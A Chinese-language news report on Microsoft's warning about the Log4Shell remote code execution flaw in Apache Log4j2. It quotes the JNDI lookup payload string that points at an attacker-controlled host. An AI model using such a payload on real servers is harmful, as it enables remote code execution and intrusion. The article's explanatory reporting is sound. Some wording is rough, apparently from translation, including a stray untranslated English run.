微软再次发出来自背景深厚的黑客组织的网络攻击警告。雷德蒙科技巨头指出,世界各地的黑客已经开始使用这种更复杂的日志记录协议技术来远程访问受害者的设备。目前观察到的大部分攻击主要涉及各方的大规模扫描。据悉,微软旗下多个威胁情报团队——包括MSTIC威胁情报中心、Microsoft365Defender威胁情报团队、RiskIQ和DART检测响应团队——一直在密切关注ApacheLog4j2远程代码执行(RCE)漏洞。CVE-2021-44228漏洞披露公告指出,名为“Log4Shell”的漏洞攻击通常在web日志请求中包含以下字符串:${jndi:ldap://[attackersite]/a}USNetworkSecurityandFoundationMicrosoft's声明也得到了设施安全局(CISA)的证实,CISA之前曾报告过Log4Shell漏洞的广泛利用。CISA负责人JenEasterly昨天在接受CNN采访时重申,如果不迅速采取补救措施,各联邦机构的设备、服务以及整个互联网都将处于相当糟糕的境地。微软警告称,Log4j2的风险源于两个方面。一个是漏洞被利用的难易程度,另一个是基于它构建的产品数量——ApacheLog4j2是目前最流行的Java日志库之一。据悉,日志库用于为开发者提供服务和产品的额外信息,让开发者可以控制应用执行过程中用户登录特定服务/设备时的错误报告,以及在遇到功能问题时收集相关数据。通过使用日志库,开发者还可以向下钻取或收集设备详细信息,包括CPU类型/GPU型号、驱动程序版本和系统内存。攻击者将使用Log4j2向目标系统执行HTTP请求以生成日志,这将利用JNDI向攻击者控制的站点执行请求,最终导致被利用的进程访问该站点并执行有效负载。在许多观察到的案例中,攻击者可以访问DNS日志系统的参数,该系统旨在记录对站点的请求以识别易受攻击的系统。一个先前已知的漏洞涉及微软的《我的世界》服务器。攻击者利用部署在聊天框中的消息内容作为渠道,试图渗透用户系统并获得控制权。事实上,全球许多知名企业都面临着巨大的风险,包括微软、推特、苹果、亚马逊、百度、Cloudflare、网易、Cloudflare等科技巨头。网络安全公司CheckPoint指出,其GitHub项目迄今已被下载超过40万次。不幸的是,尽管Apache发布了修复程序,但实施因公司而异。对于数百万客户而言,这意味着他们在未来一段时间内仍将面临Log4j入侵或大量用户数据暴露的风险。
